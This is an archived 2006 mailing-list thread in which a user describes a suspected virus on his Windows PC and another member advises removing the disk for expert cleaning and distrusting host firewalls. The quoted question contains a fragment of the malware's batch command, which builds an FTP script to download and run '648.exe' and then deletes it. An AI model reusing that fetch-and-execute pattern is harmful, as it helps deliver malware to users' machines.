More information about the Underscore mailing list

[_] PC strange behaviour

Steve Roome steve at pepcross.com
Tue Nov 7 03:09:43 GMT 2006

In general here's the approach to use if you think your machine has a
virus:

If you've not already done it, turn it off, unplug it, take the disk out
and then hand the disk to someone who knows how to make sure the virus
is completely and properly removed from the disk. It will be handy if
they're really good and can tell you how you got it too - so you don't
have it happenning really soon from the same website!

Part of the reason for this is that the virus is already running, and is
perfectly able (with the administrator privs it has) to tell the machine
what to run and what not to. i.e. it's not really getting checked, and it
won't, by pretty much any of your virus checkers, ad removers and spybot
filtering stuff. To be honest, most of that stuff is useless anyway, you
need a firewall - a real one! About the only worthwhile effect is the
cookie cleaner functionality - but one shouldn't need that with a good
browser (opera isn't so bad for this, lynx is great).

You could try a bunch of windows tools, running from the infected machine,
but it's not really worth it. Also, don't go plugging the drive into
another windows machine - unless you want that to possibly end up as toast
too.

btw, having a firewall running on the computer it's trying to protect
hardly counts as a firewall at all. Especially with the protection
model windows uses - all packets from the network pretty much reach the
kernel address space and almost all processes can read and write to that
address space. As such, it's only a firewall at the application layer
and some stuff will inevitably get around it.

Never trust a firewall on the machine you're using - especially if you're
web browsing! But do keep up to date with the MS security patches, making
a machine safe is next to impossible if you choose to run windows.

Steve

P.S. Buy a mac instead of a PC - personally I find them awful to use, but
you won't get as many virii/viruses that way!

On Mon, Nov 06, 2006 at 11:08:59AM +0000, Joe Leech wrote:

> Hi [_],
>
> My PC at home is playing up and I'm not sure why.
>
> Occasionally the command line willl just open up and a command will be
> entered along the lines of disable McAfree and symantec and ftp this
> ip address and download this file.
>
> Here's a little snippet of what I see:
> i &echo quit >> i &ftp -n -s:i &648.exe&del i&exit
>
> My firewall (sygate) blocks the FTP request so nothing bad happens.
>
> I've run AVG, adaware, spybot and a couple of online virus scanners
> all of which can't find a thing.
>
> What's going on?
>
> joe
>
>
>
> --
> *****************************************************
> joeleech.net +44 (0)7905 33 4163
>
> --
> underscore_ list info/archive -> http://www.under-score.org.uk